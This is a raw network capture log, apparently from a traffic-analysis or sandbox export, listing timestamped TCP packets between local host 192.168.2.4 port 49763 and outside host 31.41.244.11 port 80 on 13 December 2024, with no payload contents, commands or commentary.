                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.232994080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.234047890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.234060049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.234080076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.234093904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.234131098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.235109091 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.235156059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.236172915 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.236222029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.236238003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.236249924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.236287117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.237246037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.237292051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.237324953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.237374067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.239371061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.239382029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.239420891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.239573002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.239618063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.239986897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.240034103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.241115093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.241126060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.241169930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.242600918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.242613077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.242650032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.243328094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.243371964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.244734049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.244745016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.244765043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.244782925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.244817972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247282028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247294903 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247318983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247339010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247356892 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247371912 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247409105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247889042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.247977972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.248333931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.248389006 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.248956919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.249010086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.250022888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.250034094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.250053883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.250087976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.250102997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.251087904 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.251099110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.251136065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.252181053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.252226114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.252443075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.252486944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.253257036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.253268003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.253302097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.253578901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.253622055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.388887882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.389008999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.389151096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.389161110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.389216900 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.389252901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.389305115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.390496016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.390549898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.390572071 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.390619040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.391377926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.391391039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.391432047 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.392498016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.392558098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.392987013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.393040895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.393723011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.393738985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.393769979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.393793106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.394766092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.394781113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.394817114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.394846916 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.395692110 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.395745039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.395944118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.395989895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.396950006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.396961927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.397008896 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.397979021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.398035049 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.399041891 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.399055004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.399095058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.399126053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.399632931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.399677038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.400118113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.400131941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.400163889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.400192022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.401292086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.401386976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.401793003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.401869059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.402228117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.402312994 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.403074026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.403156996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.403378010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.403455019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.404128075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.404172897 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.404350996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.404392004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.405504942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.405518055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.405560017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.405581951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.405644894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.405685902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.406510115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.406553984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.407118082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.407156944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.407636881 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.407677889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.408077955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.408116102 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.408735037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.408776045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.409794092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.409806013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.409852982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.409940958 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.409985065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.411376953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.411389112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.411432028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.412067890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.412115097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.412699938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.412740946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.413419962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.413433075 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.413474083 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.413491964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.414324045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.414365053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.415255070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.415266037 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.415297031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.415363073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.415401936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.416475058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.416527987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.416800976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.416841984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.417357922 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.417402029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.417790890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.417829037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.418642044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.418653965 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.418751001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.419624090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.419677019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.419918060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.419960976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.420756102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.420815945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.421314955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.421366930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.421816111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.421828985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.421864033 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.421885967 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.422862053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.422907114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.423069000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.423109055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.424027920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.424081087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.424599886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.424644947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.425184011 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.425235987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.426161051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.426229954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.426702023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.426748037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.427656889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.427707911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.427879095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.427896976 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.427928925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.427947044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.429168940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.429214001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.429687023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.429784060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.430798054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.430840969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.431001902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.431045055 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.431773901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.431785107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.431833982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.431862116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.433006048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.433046103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.433052063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.433084011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.434073925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.434092045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.434113979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.434138060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.434835911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.434879065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.435525894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.435539961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.435555935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.435584068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.435607910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.437719107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.437740088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.437751055 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.437758923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.437787056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.437839031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.438638926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.438658953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.438694000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.438731909 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.439341068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.439393997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.439923048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.439977884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.440454006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.440502882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.441538095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.441549063 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.441569090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.441593885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.441629887 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.442482948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.442542076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.443245888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.443295002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.443783998 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.443794966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.443825960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.443844080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.444775105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.444787025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.444829941 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.444864988 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.445801973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.445874929 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.581511974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.581607103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.581669092 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.581715107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.581934929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.581980944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.582062006 CET804976331.41.244.11192.168.2.4
